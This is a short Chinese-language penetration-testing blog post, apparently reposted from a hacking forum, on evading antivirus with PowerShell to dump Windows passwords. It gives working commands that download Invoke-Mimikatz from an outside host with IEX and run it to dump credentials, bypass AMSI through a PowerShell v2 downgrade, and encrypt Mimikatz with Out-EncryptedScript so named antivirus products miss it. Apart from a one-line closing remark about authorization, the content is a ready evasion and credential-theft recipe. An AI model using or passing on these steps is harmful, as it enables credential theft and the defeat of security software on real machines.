利用Powershell免杀抓密码姿势

Delina

原文链接：利用Powershell免杀抓密码姿势
​
0x00 前言
今天给大家分享两个利用powershell来bypass杀软抓密码技巧，亲测目前不杀。
注：首发在了土司 https://www.t00ls.net/thread-62167-1-1.html
0x01 利用powershell v2绕过amsi抓密码
注：前提是win10机器需要.net3.0以上
当我们使用原始的powershell执行经典的抓密码发现，是被amsi阻止的

• 
  

powershell -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.52.134:6688/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
​
此时我们利用降维攻击，强制使用PowerShell v2绕过 amsi，因为版本2没有支持AMSI的必要内部挂钩
​
可以看到成功绕过了amsi的检测执行成功mimikatz抓到了密码！.
0x02 使用Out-EncryptedScript加密抓密码
注：亲测目前可绕过某绒和某60
Out-EncryptedScript是Powersploit中提供工具的一种，他是用来进行加密处理的脚本，首先我们将Out-EncryptedScript.ps1与Invoke-Mimikatz.ps1放到同一目录下

​

依次执行如下命令

1. powershell.exe
   
2. Import-Module .\Out-EncryptedScript.ps1
   
3. Out-EncryptedScript -ScriptPath .\Invoke-Mimikatz.ps1 -Password tubai -Salt 123456

复制代码

​
目录下便会自动生成evil.ps1文件，上传到目标机器即可
​
在目标机器依次执行如下命令

1. powershell.exe
   
2. IEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/Out-EncryptedScript.ps1")  注：由于https://raw.githubusercontent.com/不稳地，我本人是放在自己的阿里云上的。
   
3. [String] $cmd = Get-Content .\evil.ps1
   
4. Invoke-Expression $cmd
   
5. $decrypted = de tubai 123456
   
6. Invoke-Expression $decrypted
   
7. Invoke-Mimikatz

复制代码

​

如下，便成功绕过了杀软，成功的抓到了密码

​

总结：
绕过AV的方式层出不穷，powershell在内网渗透方面利用的方式非常多，远远不止免杀与信息收集，希望大家能在授权的情况下，玩转自己的绕过思路，都能总结出自己的一些bypass小技巧！
​